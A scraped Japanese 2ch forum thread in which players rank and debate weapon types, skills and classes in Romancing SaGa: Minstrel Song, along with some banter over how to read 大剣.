体術:最強技は両手大剣に匹敵するがBP高し。能力低下技や錬気、カウンターなど防御も光る。
杖:実質的にロザ術しか使わないだろう。武器としては弱いが技は強い。精霊石の杖はむしろ防具。
  電光石火が素早さ対応なので術士でも意外に高いダメージが出る。
片手斧:とにかくフライ・バイとナブラの加撃が強力。海賊対応で速い。
打槍:ウコム一本あればいい。
長剣:昔は冴えなかったがロザ重Dモードの発見から一躍ヒット。パーティが長剣だらけになった時期も。
    が、結局共振剣と不動剣くらいしか使える技がないので終盤でしか日の目を見ない。何より地味。
曲刀:幻獣剣から幻体を使えることに集約される。ダークの剣は強い。殿下が出たら\(^o^)/
小型剣:細剣の下位互換な感もあるが水竜剣での高速水術がピンチを救うことも。細工師推奨。
衝槍:下り飛竜がロマン。普段はスコーピオンで双龍破か翼の槍で吹雪かの二択。
棍棒:ろばの骨にこだわるか否かで価値が分かれる。こだわった場合、
   強度方向に改造ができないのでかめごうら割りとグランドスラムがやや使いづらい。
両手斧:対応クラスの悪さ、ディフレクト不可など両手大剣にあらゆる意味で劣る。
     君主の大斧?使ってます?
刀:最高のロマンシングを秘めた武器。いつか決めるぜクレーンプリンセスで単発乱れ雪月花。
  流星刀は攻撃力が高いがやはり防具扱い?
大型剣:青の剣さえ手に入れば…

570 :
すまない、たしかにDランクなのはおかしいかも・・・
名前も間違えてるしあまり使ったことがないんだ。
ただ序盤でローザリアサーベルが手に入るのに
基本クラスに対応してないのは悲しい。
終盤まで城塞騎士を使うつもりがある人にはいいかもしれないなぁ。

571 :
>>567
神雷と高速水術がポイント高いということさ。
>>569
ざっと読んだが棍棒のコメントがオカシイ

572 :
なるほど、俺ブラックダイヤは後回しにしちゃうので神雷に
価値を見出せなかったんだよな。スティングマーダーに400?弱っ
みたいな。あと、道場使わないのと作業が好きなので、技覚えるのと
武器鍛錬のために全体攻撃を敢えてあまり使わないのもあった。
高速水術は確かにポイント高いな。

573 :
>>572
さすがにそれは参照ステが低かったんジャマイカ。
知力だっけ?
あれはダメージあって電気属性だから大概の敵に効果的なのが良い所。
ただしディフレクト面で弱い。

574 :
>>569
弓兵のクラスとしてハンターってどうよ?

575 :
俺はクジャ闘なんかより断然ハンターだな。幻体フェニックス完全対応の上に片手斧があるし
クラス特性で、以前片手斧で指摘されてた命中率の問題をある程度克服できる。ぬこやら鳥やらにもフライバイを撃ち込めるのは有難い。
ステ下げ技が一通り揃ってるし、イドブレイクの命中率もアップ。

576 :
おまいら、俺に曲刀の魅力を語ってくれ

577 :
バーバラ姐さん+青竜刀がかっけぇ。
むしろ幻体なぞおまけにすぎんと思えるようになってきた。
真サルくらいにしか使わんし。
え?ダークの剣?強いよ。
紅孔雀?ネッシーみたいなもんだ。
技的にはコストの割りにやたら威力高い円月斬、
連携のお供にかすみ二段、
セルバ回避で加撃も期待出来るデミルーン、
AGI」下げにかかと切り、
全体攻撃には加撃まで出るブレードロール、
お手軽強技の変幻自在。
こんだけ揃ってりゃ文句あるまい。
ダークの剣じゃなくても、青竜刀+2でも問題ない威力だ。
序盤の三日月刀も使い勝手がいい。
対応してるクラスが帝国海兵、ハンター、エス古、武芸家と
多武器のクラスばかりなため、戦闘の幅も広がる。
それになんといってもアレだ、親分にも似合うよ。

578 :
曲刀は強い。
とにかくあらゆる方面の技が揃ってるからな。
術具関係を除けば、細剣・弓に匹敵する強さだと思う。
特に中盤までは明らかに細剣より上。
欠点といえば、対応クラスが多武器=ジュエルが大量に必要=1、2周目は使いにくいってことか。
ある意味、何周もやりこんだ玄人プレイヤー向けの武器。

579 :
>>575
弓と片手斧の共用は隊列補正が噛み合わないので微妙。どっちかに絞ればいいじゃん。
幻フェニ使えるからクジャ闘より断然ハンターってのも胡散臭い。いちいち幻フェニ使う相手なんて限定されるから。
幻フェニ使うならハンター、使わないならクジャ闘他くらいの住み分けでいいでしょ。
ただしクジャ闘のクラス特性は微々たるものなので、>>569のクジャ闘必須とは思わん。
目的に応じてハンターでも森番でも武芸家でもいい。

580 :
弓兵のクラスとして針千本狙いで武芸家ってどうよ?

581 :
○連射メインで火力が増す
○中列に置けばダメージが上がり、かつ打槍と両用できる
○幻体フェニクスにスキル対応する
×練気掌が暴発する可能性が上がる

582 :
練気掌の過激って本当にいらないよな〜

583 :
武芸家にしても無足加撃の発生率が上がった気がしない

584 :
体感は難しいが、ちゃんと上がってます。

585 :
(それぞれ1部だけだが
ここでランクの高い細剣・両手剣・長剣
をまとめてつかえるアレ
まだ持ってないけどどうなんだ?

586 :
お仏壇の事?使った事なーい

587 :
オブシダンは防具
ま、長剣じゃねえけどな

588 :
今まさにオブシダン使ってる。主人公バーバラの細工師で。
一応共振剣はあるし攻撃性能は高いので、BP高いキャラなら使えなくはないかな…まだアパスマとか覚えてないからなんとも。

589 :
やはり対応スキル、対応クラスが存在しないのが痛すぎる。
所詮ヒトの手には余るという事で、サルさまに献上→本領発揮の方向で。

590 :
低評価を受けてる槍二種、両手斧、棍棒、刀を
パーティのメイン武器にやってみた
で結果なんだが鍛えた後半は問題ないんだが序、中盤がきつい
ゲラ=ハやジャンを使った俺にも問題あるんだが
セルバ盾が使えない→倒れやすい→低BPの有用な技が少ない、とボス戦にえらく苦労した
反面、スウィングや土竜撃、後半なら神雷、グラスラ、払車剣、槍経由吹雪と
雑魚散らしはラクだった
ただ単体攻撃において今一つな感がぬぐえなかった

591 :
セルフ盾は封印した方が面白いだろ・・・
物理ほぼ100%カットとかおかしいもの

592 :
なまじ封印すると、セルフ盾目的じゃなくても片手武器でセルバ張れないから嫌だな
あれはバグと紙一重の仕様だよ仕様

593 :
そーいや今9週目だけど、術っていまだにいやしの水しか使ったことないな。
武器でガスガスやるのがすきなんだよな。

594 :
合成術の味をしめて何周かすると、ふとしたときに合成術なしでプレイする周回で意外に苦戦する。特に中盤までが。

595 :
どうしても使う術がかたよってしまう
俺は
セルフバーニング
いやしの水
浄化の水
ムーンライトヒール
火の鳥
三術合成サイコブラスト
くらいしか使わない。

596 :
>>594
中盤まではクイックチェッカー一発で終わるよ
その後は火の鳥

597 :
開幕ギャラクシィ×5とかやってるんじゃないでしょうね

598 :
魅了ショックウェイヴとデルタペトラ大好きな俺が通りますよ

599 :
細剣で合成術と言えば、アースハンドに気絶効果つけて前列から大地の剣で発動。
これなら序盤から使えるし、初期BP低いキャラでも働ける。

600 :
変幻自在の覚えやすさは異常

601 :
過疎りすぎ、ageルゾー

602 :
ほす

603 :
まだまだテラツヨス

604 :
細剣
上流階級の坊っちゃん嬢ちゃんのエレガントな嗜み
 
小型剣
暗殺者が使う小振りの刄
 
長剣
これぞ騎士道精神
 
両手大剣
叩きつけることにしか意味がない
 
大型剣
中途半端の象徴

605 :
良スレage

606 :
クレーンプリンセスは何となくディアナに装備させてる

607 :
大地の剣がよく似合うダークたん

608 :
あのー細剣って、ほそけんって読んでいいんでしょうか?

609 :
ダークには槍が似合うと思うんだ

610 :
炎のロッドを無駄にアビスロッドにしてみようと思ってるんだ
wktkしてきた

611 :
>>608
日本語の構成的には「さいけん」
正解はないから好きにしろ
>>609
爪があったらモーション的に似合ってたと思う

612 :
小剣 しょうけん
大剣 たいけん
に従うなら
細剣 さいけん
だな

613 :
>>611
ありがとう、ありがとうー

614 :
>>612
ありがとう、ありがとうー

615 :
>>612
だいけんな

616 :
木弓


617 :
たいけん派

618 :
だいけん?
俺もたいけんと読んでたぞ

619 :
たいけん 体験 大賢 大圏 大権 帯剣
だいけん 大検 大剣 大建
うわ「だいけん」なのか!?
「たいけん」と呼んでたんだが

620 :
だいけんだったのか
スレ住民大半の常識が覆った瞬間であった

621 :
どっちでもいい

622 :
IMEはだいけんで変換するけど、どっちでもいいんじゃないの。

623 :
さて、マイお気に入り武器の話でもしようか。
両手斧>衝槍>両手大剣>体術=片手斧>長剣>刀=打槍>弓>小剣=細剣=棍棒>杖=曲刀=大型剣
俺こんな感じ。
大型剣は好きな両手斧と被ってしまうので評価低くなっております。

624 :
正式には「たいけん」だよ。自分はだいけんって読んでしまうが。
細剣、両手大剣、弓、体術がいいな

625 :
ああ良かった、ずっとたいけんって読んでたから、
だいけんってのがなんか気持ち悪かったんだよな、はははそうか

626 :
おおつるぎって昔から読んでる俺にとってみれば
お前らどっちも気持ち悪いよ

627 :
弓>体術>衝槍>刀>>大型剣>杖>>長剣>両手大剣>片手斧>打槍>小剣>細剣>>曲刀>両手斧>棍棒
基本的に(他ゲーム含めても)こうだが、使用者によって変わることも多々。
むしろキャラ+武器の組み合わせがないと順位がつけられないかもしれない。

628 :
>>626
大剣たんハァハァw

629 :
まーちゃんごめんね

630 :
ガチムチなら両手大剣あたりが有利だし、
盗賊なら細剣・弓が有利だろうからな

631 :
だがバーバラ姐さんに武器など要らぬ。

632 :
だいけん
とかテラワロス
2chとかは日本人だけ来てくれと

633 :
バーバラ姐さんには曲刀装備させてるぜ
エルマンには弓装備させてるぜ
なんか似合ってるんだぜ

634 :
アイシャにはタウンソードを
シルバーにはスキアヴォーナを

635 :
>>632
日本人にとってどの読みが正しいのか解説してください

636 :
なんか若干打槍がハブられてる感があるから語るぜ!
打槍って言えば何かとウコム神雷でイナフと言われるが、それだけでは無いと俺は思うわけだ。
クラスは城塞・武芸とそこそこ。ロザ軽はオマケ程度。全体ディフレクト可能。
Aモードは安定した高火力こそ無いが、ほとんど無足or加撃持ち。武芸との相性がいい感じ。
唯一無足・加撃が無いのは双龍破だが、これは元々多属性で優秀な中コスト技なので問題ない。
また無双三段の派生の爆発力が高く、天衣無縫は雪月花と並ぶロマンシング奥義。
Tモードも知力低下、最速始動技、高火力と痒い所に手が届くラインナップ。
乱調子が当たらないって? 元の威力が高いし攻撃回数も多い。あとは気合!
ロザ軽のクラス特性を活かし、Tで攻撃→ウコム鉾経由水術で最速回復だ! 水竜剣とか俺知らないから!
しかしここで俺が押したいのはDモード。
ブラスパ→万物→水月と、敵の強さによって徐々に強い技を使い分けられ、
神雷までの繋ぎとして広範囲のスウィングなど豊富に揃っている。
こちらは城塞+全体ディフレクト+充実したD技のコンボで防御面は完璧!
・・・なに、長剣? 何のことだ?
低コスト技に難有りだが、そこはサブ武器で凌げる。幸い打槍対応クラスは他スキルも充実してる。
序盤にアクアマリン拾って殿下仲間にすればデフォルトで高性能&育て甲斐もあって融通の利く固定武器も持ってるし
これほど頼れる存在は無いぞ! そもそもアクアマリン献上したときに報酬でハルバード貰えばもっと高性能だ。
さぁ、今こそ打槍を使うとき! イクゾー!

637 :
打槍=ウコム鉾
打槍を追求するならシンプルに武芸家、A無双三段、重量落として無足狙いでよくね。
軽量化は黒鉄に載ってるやつで。

638 :
ウコムの鉾って衝槍じゃないんだろうか

639 :
重いウコムは武芸家にはちょっとなあ
天衣無縫狙うなら高威力且つ重量軽め
(それでも武器全体から見れば重いが)のハルバードか

640 :
武芸家は無理してウコムで神雷せんでも、弓のミリオンダラーがあるからね

641 :
ウコムが重いってのは過度に気にしすぎだと思うね。
どんな敵にも効く神雷の安定感はミリオンと違う点だし、高速水術もいける。
もし打槍使いが他にいなければ使わないのもまた損な話。
軽量化打槍メイン、中列配置なら、
サブは弓かウコム鉾の二択であっていずれか一方を敬遠することはなくね。

642 :
どんな敵にも効く安定感ってのはむしろミリオンダラーの方では
基本的な威力の差はまあしゃあないとして

643 :
火炎付きだからな。
俺は武芸家無双は前列で使うわ。
サブ刀が結構いい感じ。

644 :
ところで長剣はどこらへんが強いのか教えてくれ
よく強スキルに長剣が挙げられてるけど、
対応クラスは良いとして長剣そのもの自体はかなり微妙じゃね?

645 :
なんか地味な印象がある
全体技無し、弱体化技が心形剣だけ、大技二つだけ、派手な加撃とかも無し
終盤まで八つ裂きと共震剣とたまに十字斬りくらいしかやってない
それでも必ず長剣メインが1人居る

646 :
具体的に言うと全体ディフレクト可+Dモード特化したアーツが魅力かと
特定職との組み合わせ・・・というか城塞使ってはじめて効果を発揮する気がする
複数人城塞作ってD長剣祭りすると案外楽しいぞ
弾きまくり

647 :
       ・
あと断じて強スキルではない
純粋な攻撃力という点ではそれほどの破壊力ではない
コストパフォーマンス、攻守のバランスを両立できうる武器のひとつといった感じ

648 :
長剣は名脇役ってイメージだ。
主役になることは無いけど、欠かせないみたいな。

649 :
>>644
対応クラスが良いから高評価
強スキルというより良スキル

650 :
せめて不動剣がもうちょい閃きやすければなぁ。
いつも閃くのに時間かかりすぎて使う機会が猿戦ぐらいしかないや。

651 :
長剣技は不動剣・剣閃・ブラスパ・共振とDに使いやすい技が揃っているから、
長剣使いは城塞かロザ重で、ディフェンダー振ってこそだと俺は思う。
Dモード以外の技は割と普通だし、他の武器でも問題ない。
>>636の打槍と同じような話だけど、長剣はこれに加えて盾が使えるから防御的には最強格。
盾が使えない大型剣扱いでもいいんじゃないかと思うぐらい堅い。

652 :
>>636
>さぁ、今こそ打槍を使うとき! イクゾー!
やっぱ打槍と言えば殿下だよな、うん。

653 :
下り飛竜が竜騎士「ジャンプ」みたいでカッケ

654 :
じゃなくて流星衝のほうだ

655 :
セルバに突っ込んで撃墜されて空から落ちてくるのは従来の竜騎士にない新鮮な絵面ですね

656 :
そういえば殿下と裏切りに定評のある某竜騎士って姿がちょっと似てるね。
青黒い甲冑+マスクってだけだが

657 :
キャラというか愛され方も近いものがある気がするな。ネタキャラ?
再建スレ的には得意武器が槍つながり。

658 :
手斧ツヨス

659 :
フライバイは主人公だからな
今週はブレイズスレイブに金トロとかボコられてたけど
どうせ真打ち登場!って感じで出てくるだろ来週

660 :
で俺の予想だと2度目のスカイドライヴ覚醒しそうなヨカーソ

661 :
暇だからフライ・バイ!の登場人物紹介でもしてやんよ
フライバイ・・・物語の主人公。命中には若干難ありだが多様な敵に対応できる。仲間のピンチには「スカイドライヴ」へと覚醒することがあるらしい…?
トロイ=メライ・・・「金のトロイメライ」の通り名をもつ若きエース。得意の三段斬りで今日も速度補正により先手をとる。少しキザ。
八津崎・・・敵を八つ裂きにすることに快感を覚える少し危ない男。だがその安定感ゆえ仲間の信頼は厚い。
クロスブレイク・・・本名不詳の巨漢。命中に難ありだが「グランドクロス」と世に呼ばれる姿に変わることもある。温厚な力持ち。
狂信ケン・・・信奉する戦神から自らの寿命を縮める代償に「共震剣」という絶大な力を得た修羅。

662 :
>>661
何書いてんだと思いつつ、見てたら勝手にネタが思い浮かぶから困るw

663 :
ワロタw

664 :
あげます

665 :
刀弱すぎるwwwwwwwwwwww
グレイのイベントで使ってるがだめだこれは
細剣の変幻自在がやっぱり使い勝手いいわ

666 :
剣士あたりの両手大剣のが使い勝手がいいが、秘踏み払車で十分やっていけるわい。
幸い武芸家エス古と良クラスもある。

667 :
>>666
武芸家でやっているんだけどいつのまにか
弓ばかり使うようになってしまったよ
ハゲグレイミリアムでやってるのだがハゲを盾にして
後ろから弓と術で攻めるというのが基本になってしまった

668 :
あげ

669 :
なんか急に過疎ったな

670 :
まったくだ

671 :
急でもないよ。

672 :
ですよね〜

673 :
(´∀`)

674 :
刀には乱れ雪月花という最大のロマンシングが
体術メインエス古で全体攻撃に払車便利だし

675 :
おまえら両手斧ってどうよ?
対応クラスがほとんどないのがきついな

676 :
ゲッコの騎士のゲラ=ハにサブウエポンとして持たせてる
富士八景でぴょんぴょんさせてる

677 :
うちのavast!がここにトロイの木馬がいるとか言ってログ消しちゃった

678 :
バーバラのエンティングワロス
なにが遊んであ・げ・て だよwwwwwww

679 :
つよーい

680 :
序盤は共振剣なんかが強い細剣でやって
ヴァンダアパスマ不動あたり覚えたら細剣は火の鳥専用になるな俺は
変幻強いけどBPコスト高いから個人的には微妙

681 :
ファイナルレターは赤いZの残像のほうがよかった

682 :
正直ファイナルレターは他の技の奥義にして欲しかった

683 :
きっと金トロだな。アルマニ的に

684 :
俺には竜人を障壁以外で使いこなせそうにない
結局両手大剣で幻、火が使えるだけの鈍足剣士になる

685 :
刀で常時Tモード行動→水竜剣で回復ならそれなりに働ける
どうせディフレクト無いし

686 :
BPコストに優れてて意外と強い技と言えば共振剣かと思うんだけど
始めてサルに挑んだ時は共振剣は主力だった
他は変幻とかサブミッション、連射、瞬速の矢、スイッチバックとかハイパーハンマー

687 :
>>1
もしかして細剣経由のクリムゾンならLP消費0で使えるのか?

688 :
いいえ、使えませんが

689 :
いいえ、ケフィアry

690 :
くだ質に投下されていたダメージ計算式のサイト
ttp://tyoikenkyu.web.fc2.com/rsaga_m/top.html

691 :
まだあったのか、このスレ

692 :
Σ(*゚△゚*)ケピョ!!

693 :
こっそりage

694 :
語れ

695 :
カタール戦について語ーる

すまん、ツマラナイ上にミンサガ関係ねぇ

696 :
ロマサガはいままで細剣が好きだったけどミンサガで曲刀が好きになった

697 :
あげ

698 :
上げんなsageろ

699 :
やだ

700 :
S:細剣、両手大剣、長剣
A:片手斧、弓、体術、杖
B:打槍
C:曲刀、小型剣、衝槍 、棍棒、両手斧
D:刀

701 :
大型剣がないぞ

702 :
さすがに両手斧よりは刀の方がいいような

703 :
グレイに意地でも大型剣使わせたいのは俺だけじゃないはず

704 :
だったら竜人にしろよ
刀も使えるぜ

705 :
グレイ主人公の時くらいしか刀を使う機会が無い

706 :
レフトハンドソードって光の術具だっけ

707 :
俺の股間のフランベルジュを

708 :
叩き折ってくれるわ

709 :
 

710 :
変幻ってBP消費デカすぎて終盤しか使えないヨナ
おおつるぎテラツヨスワロタ

711 :
変幻自在のダメージをカウントできない俺は隙だらけだった

712 :
変幻は最強技の中では覚えやすい、EP食わないってだけだな

713 :
なんでシーフや海賊がフルーレとか使うの

714 :
最強の装備(武器)って
炎のロッド流星刀流星刀流星刀
って言われてるじゃんだから細剣最強テラツヨスで間違いない

715 :
12周目終盤にして改めてロッド火の鳥の強さに感嘆した

716 :
細剣と両手大剣恵まれすぎ
バランス考えろ

717 :2012/08/18
良スレアゲ
TOP カテ一覧 スレ一覧 2ch元 削除依頼
ラジアータストーリーズの動画をうpしまくるスレ (277)
ファイナルファンタジー12アンチスレ (156)
〜うたわれるもの 攻略スレ〜 其の参 (144)
スペクトラフォース クロニクル 攻略スレ (784)
ダージュオブケルベロス (237)
テイルズオブエクシリア質問スレ (356)
--log9.info------------------
【無職】なんJガチニート部★5【ひきこもり】 (269)
なんJチェインクロニクル部 (107)
AKB48公演配信専用実況☆105 (640)
NMB48実況スレ☆91 (581)
HKT48実況スレ★20 (151)
【なんJ】PZDR部★182 (155)
SKE48実況スレ1274 (381)
なんJPKMN部★31 (1001)
内田 実況・雑談402 (1001)
なんJポケモン部 フレコ交換スレ★13 (1001)
AKB48公演配信専用実況☆104 (1001)
HKT48実況スレ★19 (1001)
なんJPKMN部 交換スレ5 (1001)
AKB48公演配信専用実況☆103 (1001)
なんJMNHN部★41 (1001)
ここをれいむのゆっくりぷれいすにするよ!! (259)
--log55.com------------------
ナナ☆テスカトリに近接で来るガイジ=寄生乞食
【MHX/MHXX】ソロ専用攻略スレ part39
【MHW】マムタロトパージ条件考察スレ
チャアク民はこれでいいの・・・?
【MHXX】MHXXオンライン愚痴スレpart119
マルチで広域化+2をつけてる人は地雷認定?【エンプレスアームの罠】
【MHW】受付嬢アンチスレ HR20【開発必読】
【MHW】 リザルト画像を貼るスレ Part.2